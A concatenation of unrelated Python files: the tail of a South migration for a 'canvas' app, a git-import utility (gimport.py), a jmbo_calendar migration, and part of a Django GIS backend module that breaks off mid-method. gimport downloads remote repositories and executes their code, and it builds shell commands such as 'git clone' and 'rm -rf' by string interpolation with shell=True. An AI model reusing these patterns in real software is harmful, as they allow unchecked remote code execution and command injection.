('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'external_content'", 'to': "orm['canvas.Comment']"}), 'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'null': 'True', 'blank': 'True'}) }, 'canvas.facebookinvite': { 'Meta': {'object_name': 'FacebookInvite'}, 'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}) }, 'canvas.facebookuser': { 'Meta': {'object_name': 'FacebookUser'}, 'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'}) }, 'canvas.followcategory': { 'Meta': {'unique_together': "(('user', 'category'),)", 'object_name': 'FollowCategory'}, 'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'followers'", 'to': "orm['canvas.Category']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'following'", 'to': "orm['auth.User']"}) }, 'canvas.invitecode': { 'Meta': {'object_name': 'InviteCode'}, 'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}) }, 'canvas.remixplugin': { 'Meta': {'object_name': 'RemixPlugin'}, 'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 's3md5': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}) }, 'canvas.stashcontent': { 'Meta': {'object_name': 'StashContent'}, 'content': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'canvas.userinfo': { 'Meta': {'object_name': 'UserInfo'}, 'avatar': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Content']", 'null': 'True'}), 'bio_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), 'enable_timeline': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'enable_timeline_posts': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invite_bypass': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}), 'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']", 'null': 'True'}), 'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}), 'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'canvas.usermoderationlog': { 'Meta': {'object_name': 'UserModerationLog'}, 'action': ('django.db.models.fields.IntegerField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}), 'note': ('django.db.models.fields.TextField', [], {}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderation_log'", 'to': "orm['auth.User']"}) }, 'canvas.userwarning': { 'Meta': {'object_name': 'UserWarning'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}), 'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}), 'custom_message': ('django.db.models.fields.TextField', [], {}), 'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'issued': ('canvas.util.UnixTimestampField', [], {}), 'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_warnings'", 'to': "orm['auth.User']"}), 'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'}) }, 'canvas.welcomeemailrecipient': { 'Meta': {'object_name': 'WelcomeEmailRecipient'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'canvas_auth.user': { 'Meta': {'object_name': 'User', 'db_table': "'auth_user'", '_ormbases': ['auth.User'], 'proxy': 'True'} }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['canvas']
#!/usr/bin/env python2.7 # to use gimport: use wget or curl to download the gimport.py file locally #ie. os.system('wget -q https://github.com/scottidler/gimport/raw/master/gimport.py -O gimport.py') import os import re import imp import sys import contextlib from subprocess import Popen, PIPE sys.dont_write_bytecode = True class RepospecDecompositionError(Exception): ''' exception when repospec can't be decomposed ''' pass @contextlib.contextmanager def cd(*args, **kwargs): ''' helper change dir function to be used with 'with' expressions ''' mkdir = kwargs.pop('mkdir', True) verbose = kwargs.pop('verbose', False) path = os.path.sep.join(args) path = os.path.normpath(path) path = os.path.expanduser(path) prev = os.getcwd() if path != prev: if mkdir: run('mkdir -p %(path)s' % locals(), verbose=verbose) os.chdir(path) curr = os.getcwd() sys.path.append(curr) if verbose: print 'cd %s' % curr try: yield finally: if path != prev: sys.path.remove(curr) os.chdir(prev) if verbose: print 'cd %s' % prev def run(*args, **kwargs): ''' thin wrapper around Popen; returns exitcode, stdout and stderr ''' nerf = kwargs.pop('nerf', False) shell = kwargs.pop('shell', True) verbose = kwargs.pop('verbose', False) if (verbose or nerf) and args[0]: print args[0] if nerf: return (None, 'nerfed', 'nerfed') process = Popen(shell=shell, *args, **kwargs) stdout, stderr = process.communicate() exitcode = process.poll() if verbose and stdout: print stdout return exitcode, stdout, stderr def expand(path): ''' converts ~ -> /home/%{USER} ''' if path: return os.path.expanduser(path) def decompose(repospec, giturl=None): ''' decompoes repospec into giturl, sep, reponame and revision ''' pattern = r'(((((ssh|https)://)?([a-zA-Z0-9_.\-]+@)?)([a-zA-Z0-9_.\-]+))([:/]{1,2}))?([a-zA-Z0-9_.\-\/]+)@?([a-zA-Z0-9_.\-\/]+)?' match = re.search(pattern, repospec) if match: return match.group(2) or giturl, match.group(8), match.group(9), match.group(10) or 'HEAD' raise RepospecDecompositionError(repospec) def divine(giturl, sep, reponame, revision): ''' divines refname and commit from supplied args ''' r2c = {} # revisions to commits c2r = {} # commits to revisions result = run('git ls-remote %(giturl)s%(sep)s%(reponame)s' % locals(), stdout=PIPE)[1].strip() for line in result.split('\n'): commit, refname = line.split('\t') r2c[refname] = commit c2r[commit] = refname refnames = [ 'refs/heads/' + revision, 'refs/tags/' + revision, revision ] commit = None for refname in refnames: commit = r2c.get(refname, None) if commit: break if not commit: commit = revision return c2r.get(commit, None), commit def clone(giturl, sep, reponame, commit, cachepath, mirrorpath, versioning): ''' wraps clone command with mirroring and caching ''' mirror = '' if mirrorpath: mirror = '--reference %(mirrorpath)s/%(reponame)s.git' % locals() path = os.path.join(cachepath, reponame) repopath = reponame if versioning: repopath = os.path.join(repopath, commit) with cd(cachepath, mkdir=True): if not os.path.isdir(commit): run('git clone %(mirror)s %(giturl)s%(sep)s%(reponame)s %(repopath)s' % locals(), stdout=PIPE, stderr=PIPE) with cd(repopath): run('git clean -x -f -d', stdout=PIPE, stderr=PIPE) run('git checkout %(commit)s' % locals(), stdout=PIPE, stderr=PIPE) return os.path.join(cachepath, repopath) def rmtree(path, empties=False): ''' removes a folder path ''' try: if empties: run('rmdir ' + path) else: run('rm -rf ' + path) dpath = os.path.dirname(path) if dpath: return rmtree(dpath) return path except: return path def gimport(repospec, filepath, giturl=None, imports=None, cachepath='.gimport', mirrorpath=None, versioning=True, persist=False): ''' main function alows user to import code from a git url ''' cachepath = expand(cachepath) mirrorpath = expand(mirrorpath) giturl, sep, reponame, revision = decompose(repospec, giturl) _, commit = divine(giturl, sep, reponame, revision) path = clone(giturl, sep, reponame, commit, cachepath, mirrorpath, versioning) with cd(path): modname = os.path.splitext(os.path.basename(filepath))[0] module = imp.load_source(modname, filepath) if not persist: rmtree(path) if imports: return [module[import_] for import_ in imports] return module def main(): ''' only provided as an easy way to test module; usually used via import ''' try: import argparse except: print 'missing argparse; gimport.py can be used as a library without argparse installed' sys.exit(-1) parser = argparse.ArgumentParser() parser.add_argument( '--cachepath', default='.gimport', help='path to store all gimport cached files') parser.add_argument( '--mirrorpath', help='path to cached repos to support fast cloning') parser.add_argument( '--imports', nargs='+', help='list of imports') parser.add_argument( '--giturl', help='the giturl to be used with git clone') parser.add_argument( '--no-versioning', action='store_false', dest='versioning', help='turn versioning off; checkout in reponame rather than reponame/commit') parser.add_argument( 'repospec', help='repospec schema is giturl?reponame@revision?') parser.add_argument( 'filepath', help='the filepath inside the git repo') ns = parser.parse_args() print gimport(**ns.__dict__) sys.exit(0) if __name__ == '__main__': main()
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models from jmbo import USE_GIS class Migration(SchemaMigration): depends_on = ( ("jmbo", "0004_auto__add_field_modelbase_location"), ("foundry", "0038_auto__chg_field_country_title__chg_field_country_slug"), ) def forwards(self, orm): # Adding model 'Calendar' db.create_table('jmbo_calendar_calendar', ( ('modelbase_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['jmbo.ModelBase'], unique=True, primary_key=True)), )) db.send_create_signal('jmbo_calendar', ['Calendar']) # Adding model 'Event' db.create_table('jmbo_calendar_event', ( ('parent_ptr', self.gf('django.db.models.fields.related.OneToOneField')(related_name='+', unique=True, primary_key=True, to=orm['jmbo.ModelBase'])), ('start', self.gf('django.db.models.fields.DateTimeField')()), ('end', self.gf('django.db.models.fields.DateTimeField')()), ('repeat', self.gf('django.db.models.fields.CharField')(default='does_not_repeat', max_length=64)), ('repeat_until', self.gf('django.db.models.fields.DateField')(null=True, blank=True)), ('content', self.gf('ckeditor.fields.RichTextField')()), )) db.send_create_signal('jmbo_calendar', ['Event']) # Adding M2M table for field calendars on 'Event' db.create_table('jmbo_calendar_event_calendars', ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('event', models.ForeignKey(orm['jmbo_calendar.event'], null=False)), ('calendar', models.ForeignKey(orm['jmbo_calendar.calendar'], null=False)) )) db.create_unique('jmbo_calendar_event_calendars', ['event_id', 'calendar_id']) if USE_GIS: db.add_column('jmbo_calendar_event', 'venue', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['atlas.Location']), keep_default=False) def backwards(self, orm): # Deleting model 'Calendar' db.delete_table('jmbo_calendar_calendar') # Deleting model 'Event' db.delete_table('jmbo_calendar_event') # Removing M2M table for field calendars on 'Event' db.delete_table('jmbo_calendar_event_calendars') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'jmbo_calendar.calendar': { 'Meta': {'ordering': "('-created',)", 'object_name': 'Calendar', '_ormbases': ['jmbo.ModelBase']}, 'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'}) }, 'jmbo_calendar.event': { 'Meta': {'ordering': "('start',)", 'object_name': 'Event', '_ormbases': ['jmbo.ModelBase']}, 'calendars': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'event_calendar'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['jmbo_calendar.Calendar']"}), 'content': ('ckeditor.fields.RichTextField', [], {}), 'end': ('django.db.models.fields.DateTimeField', [], {}), 'parent_ptr': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'+'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['jmbo.ModelBase']"}), 'repeat': ('django.db.models.fields.CharField', [], {'default': "'does_not_repeat'", 'max_length': '64'}), 'repeat_until': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}), 'start': ('django.db.models.fields.DateTimeField', [], {}), }, 'category.category': { 'Meta': {'ordering': "('title',)", 'object_name': 'Category'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'category.tag': { 'Meta': {'ordering': "('title',)", 'object_name': 'Tag'}, 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'jmbo.modelbase': { 'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'}, 'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}), 'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}), 'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}), 'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}), 'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}), 'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'modified': ('django.db.models.fields.DateTimeField', [], {}), 'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}), 'publish_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}), 'retract_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}), 'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}), 'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}), 'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}) }, 'photologue.photo': { 'Meta': {'ordering': "['-date_added']", 'object_name': 'Photo'}, 'caption': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}), 'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'photo_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}), 'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'tags': ('photologue.models.TagField', [], {'max_length': '255', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}), 'title_slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}), 'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}) }, 'photologue.photoeffect': { 'Meta': {'object_name': 'PhotoEffect'}, 'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}), 'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}), 'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}), 'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.59999999999999998'}), 'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}) }, 'publisher.publisher': { 'Meta': {'object_name': 'Publisher'}, 'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '64'}) }, 'secretballot.vote': { 'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'}, 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'vote': ('django.db.models.fields.SmallIntegerField', [], {}) }, 'sites.site': { 'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"}, 'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } if USE_GIS: models.update({ 'atlas.city': { 'Meta': {'ordering': "('name',)", 'object_name': 'City'}, 'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}), 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}), 'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Region']", 'null': 'True', 'blank': 'True'}) }, 'atlas.country': { 'Meta': {'ordering': "('name',)", 'object_name': 'Country'}, 'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}), 'country_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'atlas.location': { 'Meta': {'object_name': 'Location'}, 'address': ('django.db.models.fields.TextField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}), 'city': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.City']"}), 'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}), 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}), 'description': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}), 'photo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['photologue.Photo']", 'null': 'True', 'blank': 'True'}) }, 'atlas.region': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('country', 'code'),)", 'object_name': 'Region'}, 'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}), 'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}), 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}) } }) models['jmbo_calendar.event']['venue'] = ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Location']"}) complete_apps = ['jmbo_calendar']
""" Base/mixin classes for the spatial backend database operations and the `SpatialRefSys` model the backend. """ import re from django.contrib.gis import gdal from django.utils import six from django.utils.encoding import python_2_unicode_compatible class BaseSpatialOperations(object): """ This module holds the base `BaseSpatialBackend` object, which is instantiated by each spatial database backend with the features it has. """ distance_functions = {} geometry_functions = {} geometry_operators = {} geography_operators = {} geography_functions = {} gis_terms = {} truncate_params = {} # Quick booleans for the type of this spatial backend, and # an attribute for the spatial database version tuple (if applicable) postgis = False spatialite = False mysql = False oracle = False spatial_version = None # How the geometry column should be selected. select = None # Does the spatial database have a geography type? geography = False area = False centroid = False difference = False distance = False distance_sphere = False distance_spheroid = False envelope = False force_rhr = False mem_size = False bounding_circle = False num_geom = False num_points = False perimeter = False perimeter3d = False point_on_surface = False polygonize = False reverse = False scale = False snap_to_grid = False sym_difference = False transform = False translate = False union = False # Aggregates collect = False extent = False extent3d = False make_line = False unionagg = False # Serialization geohash = False geojson = False gml = False kml = False svg = False # Constructors from_text = False from_wkb = False # Default conversion functions for aggregates; will be overridden if implemented # for the spatial backend. def convert_extent(self, box): raise NotImplementedError('Aggregate extent not implemented for this spatial backend.') def convert_extent3d(self, box): raise NotImplementedError('Aggregate 3D extent not implemented for this spatial backend.') def convert_geom(self, geom_val, geom_field): raise NotImplementedError('Aggregate method not implemented for this spatial backend.') # For quoting column values, rather than columns. def geo_quote_name(self, name): return "'%s'" % name # GeometryField operations def geo_db_type(self, f): """ Returns the database column type for the geometry field on the spatial backend. """ raise NotImplementedError def get_distance(self, f, value, lookup_type): """ Returns the distance parameters for the given geometry field, lookup value, and lookup type. """ raise NotImplementedError('Distance operations not available on this spatial backend.') def get_geom_placeholder(self, f, value): """ Returns the placeholder for the given geometry field with the given value. Depending on the spatial backend, the placeholder may contain a stored procedure call to the transformation function of the spatial backend. """ raise NotImplementedError # Spatial SQL Construction def spatial_aggregate_sql(self, agg): raise NotImplementedError('Aggregate support not implemented for this spatial backend.') def spatial_lookup_sql(self, lvalue, lookup_type, value, field): raise NotImplementedError # Routines for getting the OGC-compliant models. def geometry_columns(self): raise NotImplementedError def spatial_ref_sys(self): raise NotImplementedError @python_2_unicode_compatible class SpatialRefSysMixin(object): """ The SpatialRefSysMixin is a class used by the database-dependent SpatialRefSys objects to reduce redundnant code. """ # For pulling out the spheroid from the spatial reference string. This # regular expression is used only if the user does not have GDAL installed. # TODO: Flattening not used in all ellipsoids, could also be a minor axis, # or 'b' parameter. spheroid_regex = re.compile(r'.+SPHEROID\[\"(?P<name>.+)\",(?P<major>\d+(\.\d+)?),(?P<flattening>\d{3}\.\d+),') # For pulling out the units on platforms w/o GDAL installed. # TODO: Figure out how to pull out angular units of projected coordinate system and # fix for LOCAL_CS types. GDAL should be highly recommended for performing # distance queries. units_regex = re.compile(r'.+UNIT ?\["(?P<unit_name>[\w \'\(\)]+)", ?(?P<unit>[\d\.]+)(,AUTHORITY\["(?P<unit_auth_name>[\w \'\(\)]+)","(?P<unit_auth_val>\d+)"\])?\]([\w ]+)?(,AUTHORITY\["(?P<auth_name>[\w \'\(\)]+)","(?P<auth_val>\d+)"\])?\]$') @property def srs(self): """ Returns a GDAL SpatialReference object, if GDAL is installed. """ if gdal.HAS_GDAL: # TODO: Is caching really necessary here? Is complexity worth it? if hasattr(self, '_srs'): # Returning a clone of the cached SpatialReference object. return self._srs.clone() else: # Attempting to cache a SpatialReference object. # Trying to get from WKT first. try: self._srs = gdal.SpatialReference(self.wkt) return 